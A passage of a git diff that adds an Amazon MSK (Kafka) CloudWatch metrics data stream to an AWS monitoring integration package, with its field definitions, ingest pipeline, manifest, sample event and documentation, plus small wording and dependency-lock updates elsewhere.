- RequestTime + - RootDiskUsed + - SwapFree + - SwapUsed + - TrafficShaping + - UnderMinIsrPartitionCount + - UnderReplicatedPartitions + - ZooKeeperRequestLatencyMsMean diff --git a/packages/aws/data_stream/kafka_metrics/elasticsearch/ingest_pipeline/default.yml b/packages/aws/data_stream/kafka_metrics/elasticsearch/ingest_pipeline/default.yml new file mode 100644 index 00000000000..c44b20cf81a --- /dev/null +++ b/packages/aws/data_stream/kafka_metrics/elasticsearch/ingest_pipeline/default.yml @@ -0,0 +1,20 @@ +--- +description: "Pipeline for Amazon MSK metrics" + +processors: + - rename: + field: aws.dimensions.Cluster Name + target_field: aws.dimensions.ClusterName + ignore_missing: true + - rename: + field: aws.dimensions.Consumer Group + target_field: aws.dimensions.ConsumerGroup + ignore_missing: true + - rename: + field: aws.dimensions.Broker ID + target_field: aws.dimensions.BrokerID + ignore_missing: true + - rename: + field: aws.dimensions.Client Authentication + target_field: aws.dimensions.ClientAuthentication + ignore_missing: true diff --git a/packages/aws/data_stream/kafka_metrics/fields/agent.yml b/packages/aws/data_stream/kafka_metrics/fields/agent.yml new file mode 100644 index 00000000000..13e13903cc4 --- /dev/null +++ b/packages/aws/data_stream/kafka_metrics/fields/agent.yml @@ -0,0 +1,35 @@ +- name: cloud + title: Cloud + group: 2 + description: Fields related to the cloud or infrastructure the events are coming from. + footnote: 'Examples: If Metricbeat is running on an EC2 host and fetches data from its host, the cloud info contains the data about this machine. If Metricbeat runs on a remote machine outside the cloud and fetches data from a service running in the cloud, the field contains cloud data from the machine the service is running on.' + type: group + fields: + - name: image.id + type: keyword + description: Image ID for the cloud instance. +- name: host + title: Host + group: 2 + description: 'A host is defined as a general computing instance. + + ECS host.* fields should be populated with details about the host on which the event happened, or from which the measurement was taken. Host types include hardware, virtual machines, Docker containers, and Kubernetes nodes.' + type: group + fields: + - name: containerized + type: boolean + description: > + If the host is a container. + + - name: os.build + type: keyword + example: "18D109" + description: > + OS build information. + + - name: os.codename + type: keyword + example: "stretch" + description: > + OS codename, if any. + diff --git a/packages/aws/data_stream/kafka_metrics/fields/base-fields.yml b/packages/aws/data_stream/kafka_metrics/fields/base-fields.yml new file mode 100644 index 00000000000..2b34ac77b17 --- /dev/null +++ b/packages/aws/data_stream/kafka_metrics/fields/base-fields.yml @@ -0,0 +1,16 @@ +- name: data_stream.type + type: constant_keyword + description: Data stream type. +- name: data_stream.dataset + type: constant_keyword + description: Data stream dataset. +- name: data_stream.namespace + type: constant_keyword + description: Data stream namespace. +- name: '@timestamp' + type: date + description: Event timestamp. +- name: event.module + type: constant_keyword + description: Event module + value: aws diff --git a/packages/aws/data_stream/kafka_metrics/fields/ecs.yml b/packages/aws/data_stream/kafka_metrics/fields/ecs.yml new file mode 100644 index 00000000000..654c9b2e202 --- /dev/null +++ b/packages/aws/data_stream/kafka_metrics/fields/ecs.yml @@ -0,0 +1,70 @@ +- external: ecs + name: cloud +- external: ecs + name: cloud.account.id + dimension: true +- external: ecs + name: cloud.account.name +- external: ecs + name: cloud.availability_zone +- external: ecs + name: cloud.instance.id +- external: ecs + name: cloud.machine.type +- external: ecs + name: cloud.provider +- external: ecs + name: cloud.region + dimension: true +- external: ecs + name: ecs.version +- external: ecs + name: error +- external: ecs + name: error.message +- external: ecs + name: service.type +- external: ecs + name: host.architecture +- external: ecs + name: host.domain +- external: ecs + name: host.hostname +- external: ecs + name: host.id +- external: ecs + name: host.ip +- external: ecs + name: host.mac +- external: ecs + name: host.name +- external: ecs + name: host.os.family +- external: ecs + name: host.os.kernel +- external: ecs + name: host.os.name +- external: ecs + name: host.os.platform +- external: ecs + name: host.os.version +- external: ecs + name: host.type +- external: ecs + name: cloud.instance.name +- external: ecs + name: cloud.project.id +- external: ecs + name: container.id +- external: ecs + name: container.image.name +- external: ecs + name: container.labels +- external: ecs + name: container.name +- name: agent.id + external: ecs + dimension: true +- external: ecs + name: event.dataset + type: constant_keyword diff --git a/packages/aws/data_stream/kafka_metrics/fields/fields.yml b/packages/aws/data_stream/kafka_metrics/fields/fields.yml new file mode 100644 index 00000000000..3e8b9544c37 --- /dev/null +++ b/packages/aws/data_stream/kafka_metrics/fields/fields.yml @@ -0,0 +1,218 @@ +- name: aws + type: group + fields: + - name: kafka + type: group + fields: + - name: metrics + type: group + fields: + - name: ActiveControllerCount.sum + type: long + metric_type: gauge + description: The total number of active controllers. Only one controller per cluster should be active at any given time. + - name: BurstBalance.avg + type: long + metric_type: gauge + description: The average remaining balance of input-output burst credits for EBS volumes in the cluster. + - name: BytesInPerSec.sum + type: long + metric_type: gauge + description: The total number of bytes per second received from clients in the given collection period. + - name: BytesOutPerSec.sum + type: long + metric_type: gauge + description: The total number of bytes per second sent to clients in the given collection period. + - name: ClientConnectionCount.sum + type: long + metric_type: gauge + description: The total number of active authenticated client connections. + - name: ConnectionCount.sum + type: long + metric_type: gauge + description: The total number of active authenticated, unauthenticated, and inter-broker connections. + - name: CPUCreditBalance.avg + type: long + metric_type: gauge + description: The average number of earned CPU credits that a broker has accrued since it was launched. + - name: CpuIdle.avg + type: long + metric_type: gauge + description: The average percentage of CPU idle time. + - name: CpuIoWait.avg + type: long + metric_type: gauge + description: The average percentage of CPU idle time during a pending disk operation. + - name: CpuSystem.avg + type: long + metric_type: gauge + description: The average percentage of CPU in kernel space. + - name: CpuUser.avg + type: long + metric_type: gauge + description: The average percentage of CPU in user space. + - name: GlobalPartitionCount.sum + type: long + metric_type: gauge + description: The total number of partitions across all topics in the cluster, excluding replicas. + - name: GlobalTopicCount.sum + type: long + metric_type: gauge + description: The total number of topics across all brokers in the cluster. + - name: EstimatedMaxTimeLag.sum + type: long + metric_type: gauge + description: The total time estimate (in seconds) to drain MaxOffsetLag in the given collection period. + - name: FetchMessageConversionsPerSec.sum + type: long + metric_type: gauge + description: The total number of fetch message conversions per second for the topic in the given collection period. + - name: KafkaAppLogsDiskUsed.avg + type: long + metric_type: gauge + description: The average percentage of disk space used for application logs. + - name: KafkaDataLogsDiskUsed.avg + type: long + metric_type: gauge + description: The average percentage of disk space used for data logs. + - name: LeaderCount.sum + type: long + metric_type: gauge + description: The total number of leaders of partitions per broker, not including replicas. + - name: MaxOffsetLag.sum + type: long + metric_type: gauge + description: The total maximum offset lag across all partitions in a topic in the given collection period. + - name: MemoryBuffered.avg + type: long + metric_type: gauge + description: The average size in bytes of buffered memory for the broker. + - name: MemoryCached.avg + type: long + metric_type: gauge + description: The average size in bytes of cached memory for the broker. + - name: MemoryFree.avg + type: long + metric_type: gauge + description: The average size in bytes of memory that is free and available for the broker. + - name: HeapMemoryAfterGC.avg + type: long + metric_type: gauge + description: The average percentage of total heap memory in use after garbage collection. + - name: MemoryUsed.avg + type: long + metric_type: gauge + description: The average size in bytes of memory that is in use for the broker. + - name: MessagesInPerSec.sum + type: long + metric_type: gauge + description: The total number of incoming messages per second for the broker in the given collection period. + - name: NetworkRxDropped.sum + type: long + metric_type: counter + description: The total number of dropped receive packages. + - name: NetworkRxErrors.sum + type: long + metric_type: counter + description: The total number of network receive errors for the broker. + - name: NetworkRxPackets.sum + type: long + metric_type: counter + description: The total number of packets received by the broker. + - name: NetworkTxDropped.sum + type: long + metric_type: counter + description: The total number of dropped transmit packages. + - name: NetworkTxErrors.sum + type: long + metric_type: counter + description: The total number of network transmit errors for the broker. + - name: NetworkTxPackets.sum + type: long + metric_type: counter + description: The total number of packets transmitted by the broker. + - name: OfflinePartitionsCount.avg + type: long + metric_type: gauge + description: The average number of partitions that are offline in the cluster. + - name: PartitionCount.avg + type: long + metric_type: gauge + description: The average number of topic partitions per broker, including replicas. + - name: ProduceMessageConversionsPerSec.sum + type: long + metric_type: gauge + description: The total number of produce message conversions per second for the topic in the given collection period. + - name: ProduceTotalTimeMsMean.avg + type: long + metric_type: gauge + description: The mean produce time in milliseconds. + - name: RequestBytesMean.avg + type: long + metric_type: gauge + description: The mean number of request bytes for the broker. + - name: RequestTime.avg + type: long + metric_type: gauge + description: The average time in milliseconds spent in broker network and I/O threads to process requests. + - name: RootDiskUsed.avg + type: long + metric_type: gauge + description: The average percentage of the root disk used by the broker. + - name: SumOffsetLag.sum + type: long + metric_type: gauge + description: The total aggregated offset lag for all the partitions in a topic. + - name: SwapFree.avg + type: long + metric_type: gauge + description: The average size in bytes of swap memory that is available for the broker. + - name: SwapUsed.avg + type: long + metric_type: gauge + description: The size in bytes of swap memory that is in use for the broker. + - name: TrafficShaping.avg + type: long + metric_type: gauge + description: The average number of packets shaped (dropped or queued) due to exceeding network allocations. + - name: UnderMinIsrPartitionCount.avg + type: long + metric_type: gauge + description: The average number of under minIsr partitions for the broker. + - name: UnderReplicatedPartitions.avg + type: long + metric_type: gauge + description: The average number of under-replicated partitions for the broker. + - name: ZooKeeperRequestLatencyMsMean.avg + type: long + metric_type: gauge + description: The mean latency in milliseconds for Apache ZooKeeper requests from broker. + - name: dimensions + type: group + fields: + - name: ClusterName + type: keyword + dimension: true + description: Filters the metric data by cluster name. + - name: BrokerID + dimension: true + type: keyword + description: Filters the metric data by broker ID. + - name: ConsumerGroup + type: keyword + dimension: true + description: Filters the metric data by consumer group. + - name: Topic + dimension: true + type: keyword + description: Filters the metric data by topic. + - name: ClientAuthentication + dimension: true + type: keyword + description: Filters the metric data by client authentication. + - name: cloudwatch + type: group + fields: + - name: namespace + type: keyword + description: The namespace specified when query cloudwatch api. diff --git a/packages/aws/data_stream/kafka_metrics/fields/package-fields.yml b/packages/aws/data_stream/kafka_metrics/fields/package-fields.yml new file mode 100644 index 00000000000..4df416cc3fd --- /dev/null +++ b/packages/aws/data_stream/kafka_metrics/fields/package-fields.yml @@ -0,0 +1,7 @@ +- name: aws + type: group + fields: + - name: tags + type: flattened + description: | + Tag key value pairs from aws resources. diff --git a/packages/aws/data_stream/kafka_metrics/manifest.yml b/packages/aws/data_stream/kafka_metrics/manifest.yml new file mode 100644 index 00000000000..0f039c45eb0 --- /dev/null +++ b/packages/aws/data_stream/kafka_metrics/manifest.yml @@ -0,0 +1,52 @@ +title: AWS Kafka metrics +type: metrics +elasticsearch: + index_mode: "time_series" +streams: + - input: aws/metrics + vars: + - name: period + type: text + title: Collection Period + multi: false + required: true + show_user: true + default: 1m + - name: data_granularity + type: text + title: Data Granularity + multi: false + required: false + show_user: false + - name: regions + type: text + title: Regions + multi: true + required: false + show_user: true + - name: latency + type: text + title: Latency + multi: false + required: false + show_user: false + description: The 'latency' parameter adjusts the Metricbeat collection start and end times. AWS CloudWatch might experience delay in processing metrics for some services causing data points to be missed during the integration collection period. To mitigate this potential issue, specify a latency parameter such as `15m`. + - name: tags_filter + type: yaml + title: Tags Filter + multi: false + required: false + show_user: false + default: | + # - key: "created-by" + # value: "foo" + - name: include_linked_accounts + type: bool + title: Include Linked Accounts + multi: false + required: false + show_user: false + default: true + description: When include_linked_accounts is set to true, CloudWatch metrics will be collected from both linked accounts and the monitoring account. Default is true. + title: AWS Kafka metrics + description: Collect AWS Kafka metrics diff --git a/packages/aws/data_stream/kafka_metrics/sample_event.json b/packages/aws/data_stream/kafka_metrics/sample_event.json new file mode 100644 index 00000000000..5862e61e1c0 --- /dev/null +++ b/packages/aws/data_stream/kafka_metrics/sample_event.json @@ -0,0 +1,90 @@ +{ + "@timestamp": "2024-02-21T23:35:00.000Z", + "agent": { + "ephemeral_id": "0c8bf84c-f257-496d-a788-89af2b6959ae", + "id": "0395c9d5-9ac1-4ecc-bfd5-fc5376847519", + "name": "docker-fleet-agent", + "type": "metricbeat", + "version": "8.11.4" + }, + "aws": { + "cloudwatch": { + "namespace": "AWS/Kafka" + }, + "dimensions": { + "ClusterName": "qa-awseuw1-cp-internal-app-2-usage-data", + "ConsumerGroup": "usage-data-pipeline", + "Topic": "usage-data-pipeline" + }, + "kafka": { + "metrics": { + "EstimatedMaxTimeLag": { + "sum": 1 + }, + "MaxOffsetLag": { + "sum": 31 + }, + "SumOffsetLag": { + "sum": 31 + } + } + } + }, + "cloud": { + "account": { + "id": "123456789012", + "name": "MonitoringAccount" + }, + "provider": "aws", + "region": "eu-west-1" + }, + "data_stream": { + "dataset": "aws.kafka_metrics", + "namespace": "default", + "type": "metrics" + }, + "ecs": { + "version": "8.0.0" + }, + "elastic_agent": { + "id": "0395c9d5-9ac1-4ecc-bfd5-fc5376847519", + "snapshot": false, + "version": "8.11.4" + }, + "event": { + "agent_id_status": "verified", + "dataset": "aws.kafka_metrics", + "duration": 67075155989, + "ingested": "2024-02-21T23:47:52Z", + "module": "aws" + }, + "host": { + "architecture": "aarch64", + "containerized": false, + "hostname": "docker-fleet-agent", + "id": "1b287af46f2942b3ba34c3ee5a5c6111", + "ip": [ + "172.20.0.7" + ], + "mac": [ + "02-42-AC-14-00-07" + ], + "name": "docker-fleet-agent", + "os": { + "codename": "focal", + "family": "debian", + "kernel": "6.4.16-linuxkit", + "name": "Ubuntu", + "platform": "ubuntu", + "type": "linux", + "version": "20.04.6 LTS (Focal Fossa)" + } + }, + "metricset": { + "name": "cloudwatch", + "period": 60000 + }, + "service": { + "type": "aws" + } +} \ No newline at end of file diff --git a/packages/aws/data_stream/kinesis/manifest.yml b/packages/aws/data_stream/kinesis/manifest.yml index 82ea4ed8502..97f04ab7d37 100644 --- a/packages/aws/data_stream/kinesis/manifest.yml +++ b/packages/aws/data_stream/kinesis/manifest.yml @@ -30,7 +30,7 @@ streams: multi: false required: false show_user: false - description: To address latency issues between certain AWS services and CloudWatch, specify a latency parameter to adjust the collection start time and end time in Metricbeat such as `15m`. + description: The 'latency' parameter adjusts the Metricbeat collection start and end times. AWS CloudWatch might experience delay in processing metrics for some services causing data points to be missed during the integration collection period. To mitigate this potential issue, specify a latency parameter such as `15m`. - name: tags_filter type: yaml title: Tags Filter diff --git a/packages/aws/data_stream/lambda/manifest.yml b/packages/aws/data_stream/lambda/manifest.yml index ea3d754b140..00fdba14515 100644 --- a/packages/aws/data_stream/lambda/manifest.yml +++ b/packages/aws/data_stream/lambda/manifest.yml @@ -30,7 +30,7 @@ streams: multi: false required: false show_user: false - description: To address latency issues between certain AWS services and CloudWatch, specify a latency parameter to adjust the collection start time and end time in Metricbeat such as `15m`. + description: The 'latency' parameter adjusts the Metricbeat collection start and end times. AWS CloudWatch might experience delay in processing metrics for some services causing data points to be missed during the integration collection period. To mitigate this potential issue, specify a latency parameter such as `15m`. - name: tags_filter type: yaml title: Tags Filter diff --git a/packages/aws/data_stream/natgateway/manifest.yml b/packages/aws/data_stream/natgateway/manifest.yml index f321ee4f903..55a8853ace3 100644 --- a/packages/aws/data_stream/natgateway/manifest.yml +++ b/packages/aws/data_stream/natgateway/manifest.yml @@ -30,7 +30,7 @@ streams: multi: false required: false show_user: false - description: To address latency issues between certain AWS services and CloudWatch, specify a latency parameter to adjust the collection start time and end time in Metricbeat such as `15m`. + description: The 'latency' parameter adjusts the Metricbeat collection start and end times. AWS CloudWatch might experience delay in processing metrics for some services causing data points to be missed during the integration collection period. To mitigate this potential issue, specify a latency parameter such as `15m`. - name: include_linked_accounts type: bool title: Include Linked Accounts diff --git a/packages/aws/data_stream/rds/manifest.yml b/packages/aws/data_stream/rds/manifest.yml index a52723fe299..9c6a270a38f 100644 --- a/packages/aws/data_stream/rds/manifest.yml +++ b/packages/aws/data_stream/rds/manifest.yml @@ -30,7 +30,7 @@ streams: multi: false required: false show_user: false - description: To address latency issues between certain AWS services and CloudWatch, specify a latency parameter to adjust the collection start time and end time in Metricbeat such as `15m`. + description: The 'latency' parameter adjusts the Metricbeat collection start and end times. AWS CloudWatch might experience delay in processing metrics for some services causing data points to be missed during the integration collection period. To mitigate this potential issue, specify a latency parameter such as `15m`. - name: tags_filter type: yaml title: Tags Filter diff --git a/packages/aws/data_stream/redshift/_dev/deploy/tf/.terraform.lock.hcl b/packages/aws/data_stream/redshift/_dev/deploy/tf/.terraform.lock.hcl index f3740741719..d1947fa596b 100644 --- a/packages/aws/data_stream/redshift/_dev/deploy/tf/.terraform.lock.hcl +++ b/packages/aws/data_stream/redshift/_dev/deploy/tf/.terraform.lock.hcl @@ -2,20 +2,23 @@ # Manual edits may be lost in future updates. provider "registry.terraform.io/hashicorp/aws" { - version = "4.18.0" + version = "5.39.1" hashes = [ - "h1:62MWy6fGx/cVk1DnLcc8rUxCCKhi6/R9fi/Af/ph9ag=", - "zh:100a11324326bf849b4c85d3c40a81e485726eee99c5a229387b8485a7a8da8b", - "zh:2226bbf97101af90e43cd5606d8678f35d7e7b477657d9297c42a1bd2ed42750", - "zh:27d51694300c08c32312f8832b889c57a2821dc022d49d38f9b1e14810f8a3fb", - "zh:2b8792c76986facfd415f967c5d61022f7ceeaa46c158037fe8939e36d954f99", - "zh:3ea787967de772cc3a13469753080c8fa81be5aefc735d3753c7627f63c948e5", - "zh:64d58463cbb2b93d5202ef311a101890a1e083f9587f3eabb9f2e26dd0cf8f43", + "h1:hQLlAd6O1LdQHy1GdWtgT5fcOlc3TWW+SaaFkpe+e8E=", + "zh:05c50a5d8edb3ba4ebc4eb6e0d0b5e319142f5983b27821710ed7d475d335bdc", + "zh:082986a5784dd21957e632371b289e549f051a4ea21d5c78c6d744c3537f03c5", + "zh:192ae622ba562eacc4921ed549a794506179233d724fdd15a4f147f3400724a0", + "zh:19a1d4637a62de90b0da174c0bf01000cd900488f7e8f709d8a37f082c59756b", + "zh:1d7689a8583515f1705972d7ce57ccfab96215b19905530d2c78c02dcfaff583", + "zh:22c446a21209a52ab74b4ba1ede0b220531e97ce479430047e493a2c45e1d8cb", + "zh:4154de82290ab4e9f81bac1ea62342de8b3b7a608f99258c190d4dd1c6663e47", + "zh:6bc4859ccdc54f28af9286b2fa090a31dcb345138d68c471510b737f6a052011", + "zh:73c69e000e0b321e78a4a12fef60d37285f2afec0ea7be9e06163d985101cb59", + "zh:890a3422f5e445b49bae30facf448d0ec9cd647e9155d0b685b5b39e9d331a94", "zh:9b12af85486a96aedd8d7984b0ff811a4b42e3d88dad1a3fb4c0b580d04fa425", - "zh:b10eecf4c034a229712825124e7c0b765c5904648550dc8f844f68638531d337", - "zh:d9a3cc46e2746c40ea69bcfb2d12e765ee6bda3e1ed8ce73f272d492ff4836bb", - "zh:df625e57aa3b5fb3e4562da44daf6565289818ba2a7e66f86ad968b43fdb5148", - "zh:eaaa3a5d2a15a87b346e521872120a3ca7f6777a04226a55f51022eaf4097963", - "zh:ec6f4b00ae4f9d536f2a6c2e5a5f149867194268ce9068a9c348bc3e678fbfce", + "zh:9cd88bec0f5205df9032e3126d4e57edd1c5cc8d45cda25626882dafc485a3b0", + "zh:a3a8e3276d0fbf051bbafa192a2998b05745f2cf285ac8c36a9ad167a75c037f", + "zh:d47e4dcf4c0ad71b9a7c720be4f3a89f6786a82e77bbe8d950794562792a1da5", + "zh:f74e5b2af508c7de80a6ae5198df54a795eeba5058a0cd247828943f0c54f6e0", ] } diff --git a/packages/aws/data_stream/redshift/manifest.yml b/packages/aws/data_stream/redshift/manifest.yml index 64ba5350ca2..39fe2a86510 100644 --- a/packages/aws/data_stream/redshift/manifest.yml +++ b/packages/aws/data_stream/redshift/manifest.yml @@ -30,7 +30,7 @@ streams: multi: false required: false show_user: false - description: To address latency issues between certain AWS services and CloudWatch, specify a latency parameter to adjust the collection start time and end time in Metricbeat such as `15m`. + description: The 'latency' parameter adjusts the Metricbeat collection start and end times. AWS CloudWatch might experience delay in processing metrics for some services causing data points to be missed during the integration collection period. To mitigate this potential issue, specify a latency parameter such as `15m`. - name: include_linked_accounts type: bool title: Include Linked Accounts diff --git a/packages/aws/data_stream/s3_daily_storage/manifest.yml b/packages/aws/data_stream/s3_daily_storage/manifest.yml index 194bd377e6c..33eec16ae63 100644 --- a/packages/aws/data_stream/s3_daily_storage/manifest.yml +++ b/packages/aws/data_stream/s3_daily_storage/manifest.yml @@ -30,7 +30,7 @@ streams: multi: false required: false show_user: false - description: To address latency issues between certain AWS services and CloudWatch, specify a latency parameter to adjust the collection start time and end time in Metricbeat such as `15m`. + description: The 'latency' parameter adjusts the Metricbeat collection start and end times. AWS CloudWatch might experience delay in processing metrics for some services causing data points to be missed during the integration collection period. To mitigate this potential issue, specify a latency parameter such as `15m`. - name: include_linked_accounts type: bool title: Include Linked Accounts diff --git a/packages/aws/data_stream/s3_request/manifest.yml b/packages/aws/data_stream/s3_request/manifest.yml index ebdfb0ab649..620c188f01d 100644 --- a/packages/aws/data_stream/s3_request/manifest.yml +++ b/packages/aws/data_stream/s3_request/manifest.yml @@ -30,7 +30,7 @@ streams: multi: false required: false show_user: false - description: To address latency issues between certain AWS services and CloudWatch, specify a latency parameter to adjust the collection start time and end time in Metricbeat such as `15m`. + description: The 'latency' parameter adjusts the Metricbeat collection start and end times. AWS CloudWatch might experience delay in processing metrics for some services causing data points to be missed during the integration collection period. To mitigate this potential issue, specify a latency parameter such as `15m`. - name: include_linked_accounts type: bool title: Include Linked Accounts diff --git a/packages/aws/data_stream/s3_storage_lens/manifest.yml b/packages/aws/data_stream/s3_storage_lens/manifest.yml index 20b3a423dda..fb5ac2ff489 100644 --- a/packages/aws/data_stream/s3_storage_lens/manifest.yml +++ b/packages/aws/data_stream/s3_storage_lens/manifest.yml @@ -30,7 +30,7 @@ streams: multi: false required: false show_user: false - description: To address latency issues between certain AWS services and CloudWatch, specify a latency parameter to adjust the collection start time and end time in Metricbeat such as `15m`. + description: The 'latency' parameter adjusts the Metricbeat collection start and end times. AWS CloudWatch might experience delay in processing metrics for some services causing data points to be missed during the integration collection period. To mitigate this potential issue, specify a latency parameter such as `15m`. - name: include_linked_accounts type: bool title: Include Linked Accounts diff --git a/packages/aws/data_stream/sns/manifest.yml b/packages/aws/data_stream/sns/manifest.yml index 361557a3625..3dcd20a1107 100644 --- a/packages/aws/data_stream/sns/manifest.yml +++ b/packages/aws/data_stream/sns/manifest.yml @@ -30,7 +30,7 @@ streams: multi: false required: false show_user: false - description: To address latency issues between certain AWS services and CloudWatch, specify a latency parameter to adjust the collection start time and end time in Metricbeat such as `15m`. + description: The 'latency' parameter adjusts the Metricbeat collection start and end times. AWS CloudWatch might experience delay in processing metrics for some services causing data points to be missed during the integration collection period. To mitigate this potential issue, specify a latency parameter such as `15m`. - name: tags_filter type: yaml title: Tags Filter diff --git a/packages/aws/data_stream/sqs/manifest.yml b/packages/aws/data_stream/sqs/manifest.yml index bdb5aa8f9b2..68bb5a33c43 100644 --- a/packages/aws/data_stream/sqs/manifest.yml +++ b/packages/aws/data_stream/sqs/manifest.yml @@ -30,7 +30,7 @@ streams: multi: false required: false show_user: false - description: To address latency issues between certain AWS services and CloudWatch, specify a latency parameter to adjust the collection start time and end time in Metricbeat such as `15m`. + description: The 'latency' parameter adjusts the Metricbeat collection start and end times. AWS CloudWatch might experience delay in processing metrics for some services causing data points to be missed during the integration collection period. To mitigate this potential issue, specify a latency parameter such as `15m`. - name: include_linked_accounts type: bool title: Include Linked Accounts diff --git a/packages/aws/data_stream/transitgateway/manifest.yml b/packages/aws/data_stream/transitgateway/manifest.yml index ff51121e944..323551bc096 100644 --- a/packages/aws/data_stream/transitgateway/manifest.yml +++ b/packages/aws/data_stream/transitgateway/manifest.yml @@ -30,7 +30,7 @@ streams: multi: false required: false show_user: false - description: To address latency issues between certain AWS services and CloudWatch, specify a latency parameter to adjust the collection start time and end time in Metricbeat such as `15m`. + description: The 'latency' parameter adjusts the Metricbeat collection start and end times. AWS CloudWatch might experience delay in processing metrics for some services causing data points to be missed during the integration collection period. To mitigate this potential issue, specify a latency parameter such as `15m`. - name: include_linked_accounts type: bool title: Include Linked Accounts diff --git a/packages/aws/data_stream/usage/manifest.yml b/packages/aws/data_stream/usage/manifest.yml index f7928fdc75f..f2dd2d0bf82 100644 --- a/packages/aws/data_stream/usage/manifest.yml +++ b/packages/aws/data_stream/usage/manifest.yml @@ -30,7 +30,7 @@ streams: multi: false required: false show_user: false - description: To address latency issues between certain AWS services and CloudWatch, specify a latency parameter to adjust the collection start time and end time in Metricbeat such as `15m`. + description: The 'latency' parameter adjusts the Metricbeat collection start and end times. AWS CloudWatch might experience delay in processing metrics for some services causing data points to be missed during the integration collection period. To mitigate this potential issue, specify a latency parameter such as `15m`. - name: include_linked_accounts type: bool title: Include Linked Accounts diff --git a/packages/aws/data_stream/vpn/manifest.yml b/packages/aws/data_stream/vpn/manifest.yml index 05eb6486c9c..c2925432279 100644 --- a/packages/aws/data_stream/vpn/manifest.yml +++ b/packages/aws/data_stream/vpn/manifest.yml @@ -30,7 +30,7 @@ streams: multi: false required: false show_user: false - description: To address latency issues between certain AWS services and CloudWatch, specify a latency parameter to adjust the collection start time and end time in Metricbeat such as `15m`. + description: The 'latency' parameter adjusts the Metricbeat collection start and end times. AWS CloudWatch might experience delay in processing metrics for some services causing data points to be missed during the integration collection period. To mitigate this potential issue, specify a latency parameter such as `15m`. - name: tags_filter type: yaml title: Tags Filter diff --git a/packages/aws/docs/billing.md b/packages/aws/docs/billing.md index 4f7061c436b..1e8e96f55e2 100644 --- a/packages/aws/docs/billing.md +++ b/packages/aws/docs/billing.md @@ -8,6 +8,11 @@ For example, you could use this data to easily view your total estimated charges **IMPORTANT: Extra AWS charges on AWS API requests will be generated by this integration. Please refer to the AWS integration for more details.** +## Limitations + +When you want to group by a combination of several tags and dimensions, like `SERVICE` along with various tags (e.g., `team`, `project`, `aws:createdBy`), you might see duplicated data. This happens because of a [limitation](https://docs.aws.amazon.com/aws-cost-management/latest/APIReference/API_GetCostAndUsage.html) with the `GetCostAndUsage` API, which only allows grouping costs by two different groups. + +To avoid data duplication, it's recommended to aggregate data using a combination of two attributes, which can be either: one tag and one dimension, two tags or two dimensions. ## Data streams diff --git a/packages/aws/docs/kafka.md b/packages/aws/docs/kafka.md new file mode 100644 index 00000000000..842e6c5e99b --- /dev/null +++ b/packages/aws/docs/kafka.md @@ -0,0 +1,240 @@ +# Amazon Managed Streaming for Apache Kafka (MSK) + +The Amazon Kafka integration allows you to monitor [Amazon MSK](https://aws.amazon.com/msk/) — it's a fully managed +service that makes it easy for you to build and run applications that use Apache Kafka to process streaming data + +Use the Amazon Kafka integration to collect metrics related to your MSK clusters from CloudWatch. This integration only +supports collecting DEFAULT level monitoring metrics for now. Once these metrics are sent to Elastic, you can visualize +them in Kibana, create alerts to notify you if something goes wrong, and reference the metrics when troubleshooting +an issue. + +**IMPORTANT: Extra AWS charges on AWS API requests will be generated by this integration. Please refer to the AWS +integration for more details.** + +## Data streams + +The Amazon Kafka integration collects one type of data: metrics. + +**Metrics** give you insight into the state of Amazon MSK. +The metrics collected by the Amazon Kafka integration include bytes received from clients, bytes sent to clients, number +of incoming messages and more. See more details in the [Metrics reference](#metrics-reference) + +## Requirements + +You need Elasticsearch for storing and searching your data and Kibana for visualizing and managing it. +You can use our hosted Elasticsearch Service on Elastic Cloud, which is recommended, or self-manage the Elastic Stack on your own hardware. + +Before using any AWS integration you will need: + +* **AWS Credentials** to connect with your AWS account. +* **AWS Permissions** to make sure the user you're using to connect has permission to share the relevant data. + +For more details about these requirements, see the **AWS** integration documentation. + +## Setup + +Use this integration if you only need to collect data from the Amazon MSK service. + +If you want to collect data from two or more AWS services, consider using the **AWS** integration. +When you configure the AWS integration, you can collect data from as many AWS services as you'd like. + +For step-by-step instructions on how to set up an integration, see the +[Getting started](https://www.elastic.co/guide/en/welcome-to-elastic/current/getting-started-observability.html) guide. + +## Metrics reference + +An example event for `kafka` looks as following: + +```json +{ + "@timestamp": "2024-02-21T23:35:00.000Z", + "agent": { + "ephemeral_id": "0c8bf84c-f257-496d-a788-89af2b6959ae", + "id": "0395c9d5-9ac1-4ecc-bfd5-fc5376847519", + "name": "docker-fleet-agent", + "type": "metricbeat", + "version": "8.11.4" + }, + "aws": { + "cloudwatch": { + "namespace": "AWS/Kafka" + }, + "dimensions": { + "ClusterName": "qa-awseuw1-cp-internal-app-2-usage-data", + "ConsumerGroup": "usage-data-pipeline", + "Topic": "usage-data-pipeline" + }, + "kafka": { + "metrics": { + "EstimatedMaxTimeLag": { + "sum": 1 + }, + "MaxOffsetLag": { + "sum": 31 + }, + "SumOffsetLag": { + "sum": 31 + } + } + } + }, + "cloud": { + "account": { + "id": "123456789012", + "name": "MonitoringAccount" + }, + "provider": "aws", + "region": "eu-west-1" + }, + "data_stream": { + "dataset": "aws.kafka_metrics", + "namespace": "default", + "type": "metrics" + }, + "ecs": { + "version": "8.0.0" + }, + "elastic_agent": { + "id": "0395c9d5-9ac1-4ecc-bfd5-fc5376847519", + "snapshot": false, + "version": "8.11.4" + }, + "event": { + "agent_id_status": "verified", + "dataset": "aws.kafka_metrics", + "duration": 67075155989, + "ingested": "2024-02-21T23:47:52Z", + "module": "aws" + }, + "host": { + "architecture": "aarch64", + "containerized": false, + "hostname": "docker-fleet-agent", + "id": "1b287af46f2942b3ba34c3ee5a5c6111", + "ip": [ + "172.20.0.7" + ], + "mac": [ + "02-42-AC-14-00-07" + ], + "name": "docker-fleet-agent", + "os": { + "codename": "focal", + "family": "debian", + "kernel": "6.4.16-linuxkit", + "name": "Ubuntu", + "platform": "ubuntu", + "type": "linux", + "version": "20.04.6 LTS (Focal Fossa)" + } + }, + "metricset": { + "name": "cloudwatch", + "period": 60000 + }, + "service": { + "type": "aws" + } +} +``` + +**Exported fields** + +| Field | Description | Type | Metric Type | +|---|---|---|---| +| @timestamp | Event timestamp. | date | | +| agent.id | Unique identifier of this agent (if one exists). Example: For Beats this would be beat.id. | keyword | | +| aws.cloudwatch.namespace | The namespace specified when query cloudwatch api. | keyword | | +| aws.dimensions.BrokerID | Filters the metric data by broker ID. | keyword | | +| aws.dimensions.ClientAuthentication | Filters the metric data by client authentication. | keyword | | +| aws.dimensions.ClusterName | Filters the metric data by cluster name. | keyword | | +| aws.dimensions.ConsumerGroup | 